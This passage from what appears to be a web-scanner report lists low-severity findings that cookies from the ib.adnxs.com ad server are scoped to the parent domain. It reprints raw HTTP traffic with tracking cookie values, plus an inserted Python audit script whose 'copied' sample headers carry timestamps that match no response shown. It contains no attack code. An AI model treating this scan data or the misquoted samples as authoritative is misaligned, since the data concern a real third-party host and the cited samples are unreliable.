User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb119885=5_[r^208WMrO@Pn)IE.80Xxlp?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-hU1RiHaOEDBWHfHSmrEELrPENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBAkBAgUCAAIAAAAAeiENGgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252139%29%3Buf%28%27r%27%2C+151403%2C+1296252139%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2811%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2882%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2884%2C+%27279619581320189160%27%2C+1296252139%2C+1306620139%2C+2132%2C+24319%29%3Bppv%2887%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28619%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28620%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3Bppv%28621%2C+%27279619581320189160%27%2C+1296252139%2C+1296338539%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb119885=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb64287=5_[r^208WMrO@Pn)IE.8.%R'i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxBYVBc7kOUMBWHfHSmrEELjPUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEBQkBAgUCAAIAAAAAByCzmwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252387%29%3Buf%28%27r%27%2C+151403%2C+1296252387%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2811%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2882%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2884%2C+%27929307481590749200%27%2C+1296252387%2C+1306620387%2C+2132%2C+24319%29%3Bppv%2887%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28619%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28620%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3Bppv%28621%2C+%27929307481590749200%27%2C+1296252387%2C+1296338787%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:06:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:06:27 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-98462601_1296252387,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...
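Every ib.adnxs.com/ptj entry in this section reports the same condition: the server answers from ib.adnxs.com but sets each cookie with domain=.adnxs.com, so the cookies are sent to every host under adnxs.com, not only to the issuing one. The following Python is an added example, not code from the scanner report or from the ad network; it reproduces that check over a few Set-Cookie lines. The first four sample headers are copied from the responses above; the last two are constructed to exercise a host-only cookie (no Domain attribute) and a Domain attribute a browser would reject. All function and class names are my own.

```python
"""Classify Set-Cookie headers by domain scope relative to the issuing host.

Added example: reproduces the "cookie scoped to parent domain" check reported
above for ib.adnxs.com. Names here are the author's own, not a library API.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class CookieScope:
    name: str
    domain: Optional[str]   # normalised Domain attribute (lowercase, no leading dot); None = host-only
    parent_scoped: bool     # Domain is a proper parent of the issuing host
    rejected: bool          # Domain is neither the host nor one of its parents: browsers drop it
    httponly: bool
    secure: bool
    cleared: bool           # empty value plus an Expires attribute: a deletion cookie


def is_parent_domain(host: str, domain: str) -> bool:
    """True when host is a strict subdomain of domain, e.g. ib.adnxs.com under adnxs.com."""
    host, domain = host.lower(), domain.lower().lstrip(".")
    return host != domain and host.endswith("." + domain)


def parse_set_cookie(value: str, issuing_host: str) -> CookieScope:
    """Parse one Set-Cookie value and classify its domain scope for issuing_host."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flags like HttpOnly get an empty value

    host = issuing_host.lower()
    domain = attrs.get("domain")
    if domain is not None:
        domain = domain.lower().lstrip(".")

    parent_scoped = domain is not None and is_parent_domain(host, domain)
    # A Domain that is neither the host nor an ancestor of it is discarded by browsers.
    # Public-suffix domains (e.g. "com") are also rejected; that check is omitted here.
    rejected = domain is not None and domain != host and not parent_scoped

    return CookieScope(
        name=name.strip(),
        domain=domain,
        parent_scoped=parent_scoped,
        rejected=rejected,
        httponly="httponly" in attrs,
        secure="secure" in attrs,
        cleared=cookie_value.strip() == "" and "expires" in attrs,
    )


def audit_response_headers(raw_headers: List[str], issuing_host: str) -> List[CookieScope]:
    """Run parse_set_cookie over every Set-Cookie line in a list of raw header lines."""
    results = []
    for line in raw_headers:
        header, _, value = line.partition(":")
        if header.strip().lower() == "set-cookie":
            results.append(parse_set_cookie(value.strip(), issuing_host))
    return results


def parent_scoped_names(results: List[CookieScope]) -> List[str]:
    """Names of cookies a browser would keep and share with sibling hosts."""
    return [r.name for r in results if r.parent_scoped and not r.rejected]


# Sample input: the first four lines are copied from the ib.adnxs.com responses in the
# report; the last two are constructed for this example.
SAMPLE_HEADERS = [
    "Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly",
    "Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly",
    "Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly",
    "Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:49 GMT; domain=.adnxs.com; HttpOnly",
    "Set-Cookie: hostonly=1; path=/; HttpOnly",        # constructed: no Domain -> host-only cookie
    "Set-Cookie: bad=1; path=/; domain=example.com",   # constructed: not a parent of the host -> rejected
]

if __name__ == "__main__":
    for r in audit_response_headers(SAMPLE_HEADERS, "ib.adnxs.com"):
        scope = "REJECTED" if r.rejected else ("parent:" + r.domain if r.parent_scoped else "host-only")
        flags = ",".join(f for f, on in (("HttpOnly", r.httponly), ("Secure", r.secure)) if on)
        print(f"{r.name:<12} {scope:<18} flags={flags or '-'} cleared={r.cleared}")
```

Run against the responses above, every cookie comes back parent-scoped to adnxs.com with HttpOnly set and Secure absent; the acb* cookies with an empty value and a 1980 expiry are deletions of earlier instances, which is why the response also issues a fresh acb* cookie each time. Since /ptj is served over plain http:// and none of the values looks like a session token, the report's Information severity is appropriate; the same scoping would matter more on a host that shares its parent domain with less trusted subdomains.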

10.80. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-85794731_1296251888%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D262895%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.33319127024151385%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 
acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb120773=5_[r^208WMuF4Lw)IE.826L=t?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP_MUEDZxdL5eBWHfHSmrEELwO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEoAUBAgUCAAIAAAAAaCEU6wAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251888%29%3Buf%28%27r%27%2C+151403%2C+1296251888%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2811%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2882%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2884%2C+%276827022114727400691%27%2C+1296251888%2C+1306619888%2C+2132%2C+24319%29%3Bppv%2887%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28619%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28620%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3Bppv%28621%2C+%276827022114727400691%27%2C+1296251888%2C+1296338288%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 21:58:08 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 21:58:08 GMT
Content-Length: 743

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.81. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: the responses from ib.adnxs.com set them with domain=.adnxs.com, so every host under adnxs.com can read and overwrite them. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-79489099_1296252890%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D917199%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.6830512962769717%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb810948=5_[r^208WMuF4Lw)IE.8.Cw7k?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPzre96IF0ShCBWHfHSmrEELkPkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEYAYBAgUCAAIAAAAAwyH-GwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252644%29%3Buf%28%27r%27%2C+151403%2C+1296252644%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2811%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2882%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2884%2C+%274767290027710864954%27%2C+1296252644%2C+1306620644%2C+2132%2C+24319%29%3Bppv%2887%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28619%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28620%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3Bppv%28621%2C+%274767290027710864954%27%2C+1296252644%2C+1296339044%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb810948=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb161789=5_[r^208WMM2x@N!@@-#c5UK9?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP3ReQm0PH-EwBWHfHSmrEEKCcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQELgkBAgUCAAIAAAAATiHU5gAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265346%29%3Buf%28%27r%27%2C+116344%2C+1296265346%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:26 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:26 GMT
Content-Length: 741

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.82. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

